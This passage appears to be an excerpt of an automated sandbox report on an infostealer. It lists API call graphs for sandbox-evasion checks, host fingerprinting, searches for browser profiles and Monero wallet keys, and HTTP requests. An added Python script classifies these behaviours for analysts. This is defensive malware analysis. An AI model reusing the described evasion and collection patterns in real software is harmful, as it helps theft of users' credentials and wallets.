                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01225570), ref: 00489933
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012255B0), ref: 0048994C
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012322C0), ref: 00489964
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012322A8), ref: 0048997C
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01232308), ref: 00489995
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012323F8), ref: 004899AD
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012254D0), ref: 004899C5
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01232428), ref: 004899DE
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 004711D0: ExitProcess.KERNEL32 ref: 00471211
                      • Part of subcall function 00471160: GetSystemInfo.KERNEL32(?), ref: 0047116A
                      • Part of subcall function 00471160: ExitProcess.KERNEL32 ref: 0047117E
                      • Part of subcall function 00471110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0047112B
                      • Part of subcall function 00471110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00471132
                      • Part of subcall function 00471110: ExitProcess.KERNEL32 ref: 00471143
                      • Part of subcall function 00471220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0047123E
                      • Part of subcall function 00471220: __aulldiv.LIBCMT ref: 00471258
                      • Part of subcall function 00471220: __aulldiv.LIBCMT ref: 00471266
                      • Part of subcall function 00471220: ExitProcess.KERNEL32 ref: 00471294
                      • Part of subcall function 00486770: GetUserDefaultLangID.KERNEL32 ref: 00486774
                      • Part of subcall function 00471190: ExitProcess.KERNEL32 ref: 004711C6
                      • Part of subcall function 00487850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004711B7), ref: 00487880
                      • Part of subcall function 00487850: RtlAllocateHeap.NTDLL(00000000), ref: 00487887
                      • Part of subcall function 00487850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0048789F
                      • Part of subcall function 004878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487910
                      • Part of subcall function 004878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00487917
                      • Part of subcall function 004878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0048792F
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01239170,?,0049110C,?,00000000,?,00491110,?,00000000,00490AEF), ref: 00486ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00486AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00486AF9
                    • Sleep.KERNEL32(00001770), ref: 00486B04
                    • CloseHandle.KERNEL32(?,00000000,?,01239170,?,0049110C,?,00000000,?,00491110,?,00000000,00490AEF), ref: 00486B1A
                    • ExitProcess.KERNEL32 ref: 00486B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                    • String ID:
                    • API String ID: 2525456742-0
                    • Opcode ID: 9d8793d9fcd3c693680624316de4629464d578c1c4762df50f78759331bd5c8a
                    • Instruction ID: e1a048ee0071cc31808b448249f2aba5b324e776b99f0c07290ef6ea132cd7f9
                    • Opcode Fuzzy Hash: 9d8793d9fcd3c693680624316de4629464d578c1c4762df50f78759331bd5c8a
                    • Instruction Fuzzy Hash: 9B311E71904208AAEB04F7E1DC56BEE7739AF04304F10496FF112A6192DFBC6945C7AA

                    Control-flow Graph

                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0047123E
                    • __aulldiv.LIBCMT ref: 00471258
                    • __aulldiv.LIBCMT ref: 00471266
                    • ExitProcess.KERNEL32 ref: 00471294
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                    • String ID: @
                    • API String ID: 3404098578-2766056989
                    • Opcode ID: c169da84fef3fd6c53ca0bb048d8577358745e376a51be03929fc7d38d53a04c
                    • Instruction ID: 21337400f32bcaaf6a722c11d86a3c57503d42cf3020d2a6c658fee0f82be385
                    • Opcode Fuzzy Hash: c169da84fef3fd6c53ca0bb048d8577358745e376a51be03929fc7d38d53a04c
                    • Instruction Fuzzy Hash: 5C016DB0D44308FAEB10EBE4DC49BDEBB78AB04705F20858AE709B62D1D7785941879D

                    Control-flow Graph

                    APIs
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01239170,?,0049110C,?,00000000,?,00491110,?,00000000,00490AEF), ref: 00486ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00486AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00486AF9
                    • Sleep.KERNEL32(00001770), ref: 00486B04
                    • CloseHandle.KERNEL32(?,00000000,?,01239170,?,0049110C,?,00000000,?,00491110,?,00000000,00490AEF), ref: 00486B1A
                    • ExitProcess.KERNEL32 ref: 00486B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                    • String ID:
                    • API String ID: 941982115-0
                    • Opcode ID: 627695089eb96dfbe65d29d220d9089b584b76264625a493db0f58cb1ac4bc76
                    • Instruction ID: 080a5fc73e2fe60d257de9be255cead15236a871011debc00b0696390d2e56d1
                    • Opcode Fuzzy Hash: 627695089eb96dfbe65d29d220d9089b584b76264625a493db0f58cb1ac4bc76
                    • Instruction Fuzzy Hash: ACF03AB0944219AAE740FBA09C06BBE7B34EB04705F114E1AF512A12C1DBF96981D75B

                    Control-flow Graph

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CrackInternetlstrlen
                    • String ID: <
                    • API String ID: 1274457161-4251816714
                    • Opcode ID: 00712f95e145abe199289d1497ef23af860f3b2ca73dcb267bdec721ae7b8268
                    • Instruction ID: 82ab199545416e96a3f51836d500ecb92b75d69c6c94f67e8b3eaceaa17e0f5e
                    • Opcode Fuzzy Hash: 00712f95e145abe199289d1497ef23af860f3b2ca73dcb267bdec721ae7b8268
                    • Instruction Fuzzy Hash: 5D216FB1D00208ABDF14EFA5E845ADE7B75FB04320F10862AF919A72C0EB746A05CF91

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 00476280: InternetOpenA.WININET(00490DFE,00000001,00000000,00000000,00000000), ref: 004762E1
                      • Part of subcall function 00476280: StrCmpCA.SHLWAPI(?,0123E858), ref: 00476303
                      • Part of subcall function 00476280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00476335
                      • Part of subcall function 00476280: HttpOpenRequestA.WININET(00000000,GET,?,0123E298,00000000,00000000,00400100,00000000), ref: 00476385
                      • Part of subcall function 00476280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004763BF
                      • Part of subcall function 00476280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004763D1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00485228
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                    • String ID: ERROR$ERROR
                    • API String ID: 3287882509-2579291623
                    • Opcode ID: 68394b0f972cebbee60df293262e273e1c426ab8e9ee640bd2bf176549a0f73f
                    • Instruction ID: 0174d4b3077bb314ac40494ad62e481b3a60c2e7b88d0570749c3362a3f06e02
                    • Opcode Fuzzy Hash: 68394b0f972cebbee60df293262e273e1c426ab8e9ee640bd2bf176549a0f73f
                    • Instruction Fuzzy Hash: 73117730800008A7DB08FF65DD52AED3338AF40304F40495FF80A56592EF7CAB15CB6A
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487910
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00487917
                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0048792F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: Heap$AllocateComputerNameProcess
                    • String ID:
                    • API String ID: 1664310425-0
                    • Opcode ID: 26c3296a272dae15783e17672e176f0e250ccb049e8dd49008aa80d08af483b6
                    • Instruction ID: b72455174323a80419cc8abad70bd2410af90d5c145dda18009c7f9560230dab
                    • Opcode Fuzzy Hash: 26c3296a272dae15783e17672e176f0e250ccb049e8dd49008aa80d08af483b6
                    • Instruction Fuzzy Hash: B20186F1944204EFD700DF94DD45BAEBBB8F704B21F20461AF645E3680D37859408BA6
                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0047112B
                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00471132
                    • ExitProcess.KERNEL32 ref: 00471143
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: Process$AllocCurrentExitNumaVirtual
                    • String ID:
                    • API String ID: 1103761159-0
                    • Opcode ID: 0bda4d3391a7298d9c6b5aae8fc5a44677b409c2c23d52ece3dba9f421c9a7a1
                    • Instruction ID: 37f3616787a6579acff57b788ffcb55a996646b960c0fb7545956d99e3d7bc90
                    • Opcode Fuzzy Hash: 0bda4d3391a7298d9c6b5aae8fc5a44677b409c2c23d52ece3dba9f421c9a7a1
                    • Instruction Fuzzy Hash: 08E086B0985348FBE7106BE4DC0AB4976B8EB04B01F105159F7087A5D0C6B526409699
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004710B3
                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004710F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID:
                    • API String ID: 2087232378-0
                    • Opcode ID: 234cb2fb83887244116228abd73772ab23810611198253ef0b7c210e2134ba1f
                    • Instruction ID: 601ae1a75bd9ff07285524ae3a99363c0ed73c1fb009980da8fb2b73a27519d3
                    • Opcode Fuzzy Hash: 234cb2fb83887244116228abd73772ab23810611198253ef0b7c210e2134ba1f
                    • Instruction Fuzzy Hash: 6FF0E2B1641308BBE7149AA8AC49FEFB7ECE705B15F305949F504E3390D5719E40CAA4
                    APIs
                      • Part of subcall function 004878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487910
                      • Part of subcall function 004878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00487917
                      • Part of subcall function 004878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0048792F
                      • Part of subcall function 00487850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004711B7), ref: 00487880
                      • Part of subcall function 00487850: RtlAllocateHeap.NTDLL(00000000), ref: 00487887
                      • Part of subcall function 00487850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0048789F
                    • ExitProcess.KERNEL32 ref: 004711C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                    • String ID:
                    • API String ID: 3550813701-0
                    • Opcode ID: fab9f6f789476cea87074006073f7014a630dfbf51f1807756438354170e602c
                    • Instruction ID: 285ff7bc2985056bd95474738ec64c5b1d3d6dc00fe7b8830795fb8d10fc7d02
                    • Opcode Fuzzy Hash: fab9f6f789476cea87074006073f7014a630dfbf51f1807756438354170e602c
                    • Instruction Fuzzy Hash: 5EE086F591420153CB0037F66C06B2E324C5704349F44192EF50882252FD1DE400876D
                    APIs
                    • wsprintfA.USER32 ref: 004838CC
                    • FindFirstFileA.KERNEL32(?,?), ref: 004838E3
                    • lstrcat.KERNEL32(?,?), ref: 00483935
                    • StrCmpCA.SHLWAPI(?,00490F70), ref: 00483947
                    • StrCmpCA.SHLWAPI(?,00490F74), ref: 0048395D
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00483C67
                    • FindClose.KERNEL32(000000FF), ref: 00483C7C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                    • API String ID: 1125553467-2524465048
                    • Opcode ID: 965db8b32ac0eec2762e3a7aa9b12b5dd468fa55fdc2691442a4b5dadc12a887
                    • Instruction ID: b39f13ef8626c6bc5478f10727f4eb11f41dae2d4786befab467f5ea60ea3518
                    • Opcode Fuzzy Hash: 965db8b32ac0eec2762e3a7aa9b12b5dd468fa55fdc2691442a4b5dadc12a887
                    • Instruction Fuzzy Hash: 51A152B2A00208ABDB24EFA4DC85FEE7379BF44701F04499DE50D96141EB799B84CF66
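                    The entries in this section are bare call lists, so the sandbox-evasion and collection patterns they encode are easy to miss. The following Python is an added example for this report, not Joe Sandbox or Stealc code: it parses entries in the "APIs" format used above and tags what each call sequence implies, covering the WinINet request function at 00485228, the VirtualAllocExNuma/ExitProcess function at 0047112B, the large VirtualAlloc/VirtualFree function at 004710B3, and the FindFirstFileA/FindNextFileA/FindClose walks such as the one at 004838E3. It assumes that the plugin prints the resolved stack slots at each call site, so the arguments shown on the parameterless GetCurrentProcess line are the ones already pushed for the following VirtualAllocExNuma; the Win32 constant values are from the public SDK headers, while the tag names and the 256 MiB threshold for calling an allocation a RAM probe are the example's own choices. The InternetSetOptionA value is "?" in the report (not statically resolved), so the example only records that INTERNET_OPTION_SECURITY_FLAGS was set. The sample entries embedded at the bottom are copied from the report.

```python
"""Added example for this report, not Joe Sandbox or Stealc code: parse the
"APIs" lines of a function entry and tag the behaviour the call sequence implies.
The entries at the bottom are copied from the report; the tag names and the
256 MiB threshold are this example's own choices."""
import re

# One call line. Subcall lines carry a "Part of subcall function XXXXXXXX:" prefix;
# calls whose arguments were not resolved have no parenthesised list at all.
CALL_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)

# Win32 constants, values from the public SDK headers.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x8000: "MEM_RELEASE"}
PAGE_PROT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
HTTP_FLAGS = {0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
              0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
              0x00800000: "INTERNET_FLAG_SECURE"}
INTERNET_SERVICE_HTTP = 3
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
BIG_ALLOC = 256 << 20  # assumption: a commit this large only probes how much RAM the host has


def hexarg(arg):
    """Statically resolved 8-digit hex argument -> int; '?' and string literals -> None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-F]{8}", arg) else None


def decode_flags(value, table):
    """Names of the bits of `value` listed in `table`; unlisted bits are ignored."""
    return [name for bit, name in table.items() if value & bit]


def parse_calls(entry):
    """[(api, [args], ref)] for every call line of one function entry, subcalls included."""
    calls = []
    for line in entry.splitlines():
        m = CALL_RE.search(line)
        if m:
            raw = m.group("args")
            calls.append((m.group("api"), [a.strip() for a in raw.split(",")] if raw else [], m.group("ref")))
    return calls


def classify(entry):
    """Return (tags, notes): behaviour tags plus decoded arguments worth a second look."""
    calls = parse_calls(entry)
    names = {api for api, _, _ in calls}
    args_of = {api: args for api, args, _ in calls}
    tags, notes = [], []
    if "VirtualAllocExNuma" in names and "ExitProcess" in names:
        # The plugin prints the stack slots at the call site, so the values shown on the
        # parameterless GetCurrentProcess line are the ones pushed for VirtualAllocExNuma.
        slots = [hexarg(a) for a in args_of.get("GetCurrentProcess", [])]
        if len(slots) == 5 and None not in slots:
            notes.append("VirtualAllocExNuma size=%d %s %s node=%d" % (
                slots[1], "|".join(decode_flags(slots[2], MEM_FLAGS)),
                PAGE_PROT.get(slots[3], hex(slots[3])), slots[4]))
        tags.append("sandbox-probe:numa")
    if "VirtualAlloc" in names and "VirtualFree" in names:
        va = args_of["VirtualAlloc"]
        size = hexarg(va[1]) if len(va) > 1 else None
        if size is not None and size >= BIG_ALLOC:
            tags.append("sandbox-probe:ram")
            notes.append("VirtualAlloc of %d bytes (%d MiB), released again" % (size, size >> 20))
    if {"FindFirstFileA", "FindNextFileA", "FindClose"} <= names:
        tags.append("directory-walk")
    if {"HttpOpenRequestA", "HttpSendRequestA"} <= names:
        tags.append("http-client")
        con = args_of.get("InternetConnectA", [])
        if len(con) >= 6 and hexarg(con[5]) == INTERNET_SERVICE_HTTP:
            notes.append("InternetConnectA service=INTERNET_SERVICE_HTTP")
        req = args_of["HttpOpenRequestA"]
        if len(req) >= 7:
            flags = decode_flags(hexarg(req[6]) or 0, HTTP_FLAGS)
            notes.append("%s request, flags %s" % (req[1], "|".join(flags) or "0"))
        opt = args_of.get("InternetSetOptionA", [])
        if len(opt) >= 2 and hexarg(opt[1]) == INTERNET_OPTION_SECURITY_FLAGS:
            notes.append("INTERNET_OPTION_SECURITY_FLAGS set before HttpSendRequestA (value not static)")
    if names & {"GetComputerNameA", "GetUserNameA"}:
        tags.append("host-fingerprint")
    return tags, notes


# Entries copied from the report (used here as constructed test input).
NUMA_ENTRY = """
• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0047112B
• VirtualAllocExNuma.KERNEL32(00000000), ref: 00471132
• ExitProcess.KERNEL32 ref: 00471143
"""
RAM_ENTRY = """
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004710B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004710F7
"""
HTTP_ENTRY = """
  • Part of subcall function 00476280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00476335
  • Part of subcall function 00476280: HttpOpenRequestA.WININET(00000000,GET,?,0123E298,00000000,00000000,00400100,00000000), ref: 00476385
  • Part of subcall function 00476280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004763BF
  • Part of subcall function 00476280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004763D1
• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00485228
"""
WALK_ENTRY = """
• FindFirstFileA.KERNEL32(?,?), ref: 004838E3
• StrCmpCA.SHLWAPI(?,00490F70), ref: 00483947
• StrCmpCA.SHLWAPI(?,00490F74), ref: 0048395D
• FindNextFileA.KERNEL32(000000FF,?), ref: 00483C67
• FindClose.KERNEL32(000000FF), ref: 00483C7C
"""

if __name__ == "__main__":
    for name, entry in (("NUMA", NUMA_ENTRY), ("RAM", RAM_ENTRY), ("HTTP", HTTP_ENTRY), ("WALK", WALK_ENTRY)):
        print(name, *classify(entry))
```

                    Running it on the four embedded entries tags them sandbox-probe:numa, sandbox-probe:ram, http-client and directory-walk respectively; the notes spell out the 2000-byte PAGE_EXECUTE_READWRITE commit on NUMA node 0 that precedes the ExitProcess, the 399,000,000-byte (380 MiB) PAGE_READWRITE commit that is immediately released, and the GET request sent with INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE over INTERNET_SERVICE_HTTP. Both allocation functions exit the process on failure, which is why an analysis VM with little RAM or no NUMA support never reaches the collection code.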
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • FindFirstFileA.KERNEL32(00000000,?,00490B32,00490B2B,00000000,?,?,?,004913F4,00490B2A), ref: 0047BEF5
                    • StrCmpCA.SHLWAPI(?,004913F8), ref: 0047BF4D
                    • StrCmpCA.SHLWAPI(?,004913FC), ref: 0047BF63
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0047C7BF
                    • FindClose.KERNEL32(000000FF), ref: 0047C7D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                    • API String ID: 3334442632-726946144
                    • Opcode ID: cca383e97c41c12472603594c849d3100c12a130babcc937aac4f72bddaa4aec
                    • Instruction ID: 642f45e235a3cea499554499a0034f459c3c041ffa36d000783fb0c0b17accd9
                    • Opcode Fuzzy Hash: cca383e97c41c12472603594c849d3100c12a130babcc937aac4f72bddaa4aec
                    • Instruction Fuzzy Hash: E24285729001046BDB14FB61DC96EED733DAB44304F40896FF50A92191EE7CAB59CBAA
                    APIs
                    • wsprintfA.USER32 ref: 0048492C
                    • FindFirstFileA.KERNEL32(?,?), ref: 00484943
                    • StrCmpCA.SHLWAPI(?,00490FDC), ref: 00484971
                    • StrCmpCA.SHLWAPI(?,00490FE0), ref: 00484987
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00484B7D
                    • FindClose.KERNEL32(000000FF), ref: 00484B92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s$%s\%s$%s\*
                    • API String ID: 180737720-445461498
                    • Opcode ID: 2fb591ecdc8a160adffc29cc2f45301d844a8442d62517231859a13232f3eb95
                    • Instruction ID: b4a1857187b49745dde974c516fbce93845badbe02a8502d06a27e44099a2b5f
                    • Opcode Fuzzy Hash: 2fb591ecdc8a160adffc29cc2f45301d844a8442d62517231859a13232f3eb95
                    • Instruction Fuzzy Hash: 486154F2900219ABCB24EBE0DC45FEE777DBB48700F00869DE50996141EB79AB85CF95
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00484580
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00484587
                    • wsprintfA.USER32 ref: 004845A6
                    • FindFirstFileA.KERNEL32(?,?), ref: 004845BD
                    • StrCmpCA.SHLWAPI(?,00490FC4), ref: 004845EB
                    • StrCmpCA.SHLWAPI(?,00490FC8), ref: 00484601
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0048468B
                    • FindClose.KERNEL32(000000FF), ref: 004846A0
                    • lstrcat.KERNEL32(?,0123E758), ref: 004846C5
                    • lstrcat.KERNEL32(?,0123D620), ref: 004846D8
                    • lstrlen.KERNEL32(?), ref: 004846E5
                    • lstrlen.KERNEL32(?), ref: 004846F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Similarity
                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                    • String ID: %s\%s$%s\*
                    • API String ID: 671575355-2848263008
                    • Opcode ID: 6180af35ddef25957413058d136974c448de13189ba925ba31cc294ada97d09c
                    • Instruction ID: 0b2f2967e3ff3bf4a77c855449ce0ac1d60f22c74338e47a54f76d66a283aef2
                    • Opcode Fuzzy Hash: 6180af35ddef25957413058d136974c448de13189ba925ba31cc294ada97d09c
                    • Instruction Fuzzy Hash: F35156B5900218ABCB24FBB0DC89FED737DAB54300F405A99F60992150EF789B848F96
                    APIs
                    • wsprintfA.USER32 ref: 00483EC3
                    • FindFirstFileA.KERNEL32(?,?), ref: 00483EDA
                    • StrCmpCA.SHLWAPI(?,00490FAC), ref: 00483F08
                    • StrCmpCA.SHLWAPI(?,00490FB0), ref: 00483F1E
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0048406C
                    • FindClose.KERNEL32(000000FF), ref: 00484081
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s
                    • API String ID: 180737720-4073750446
                    • Opcode ID: 280667c0786b7deb9b2ecf2dcf0bc6e7c9f4d52259960734cfbcc9f69d1ccdc1
                    • Instruction ID: 81c2ba857cd64038bc1e4317fc0d0179afeeb61f1a1f50851f971a46365bc6c2
                    • Opcode Fuzzy Hash: 280667c0786b7deb9b2ecf2dcf0bc6e7c9f4d52259960734cfbcc9f69d1ccdc1
                    • Instruction Fuzzy Hash: EA5185F2900218ABCB24FBB0DC85EEE737DBB44704F404A9DB61992040EB79DB858F95
                    APIs
                    • wsprintfA.USER32 ref: 0047ED3E
                    • FindFirstFileA.KERNEL32(?,?), ref: 0047ED55
                    • StrCmpCA.SHLWAPI(?,00491538), ref: 0047EDAB
                    • StrCmpCA.SHLWAPI(?,0049153C), ref: 0047EDC1
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0047F2AE
                    • FindClose.KERNEL32(000000FF), ref: 0047F2C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\*.*
                    • API String ID: 180737720-1013718255
                    • Opcode ID: 8bbe537c1b444f44a605fb5f18309e319b80fe4784569c3a47a9b321c5f90439
                    • Instruction ID: f3d0555e607baa478acdbb44acbc873ffda618b921fbbccb2609d0a85d104af9
                    • Opcode Fuzzy Hash: 8bbe537c1b444f44a605fb5f18309e319b80fe4784569c3a47a9b321c5f90439
                    • Instruction Fuzzy Hash: A8E1F2719111189AEB54FB61CC51EEE7338AF54304F4049EFB40A62052EE7C6F9ACF6A
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004915B8,00490D96), ref: 0047F71E
                    • StrCmpCA.SHLWAPI(?,004915BC), ref: 0047F76F
                    • StrCmpCA.SHLWAPI(?,004915C0), ref: 0047F785
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0047FAB1
                    • FindClose.KERNEL32(000000FF), ref: 0047FAC3
                    Strings
                    Memory Dump Source
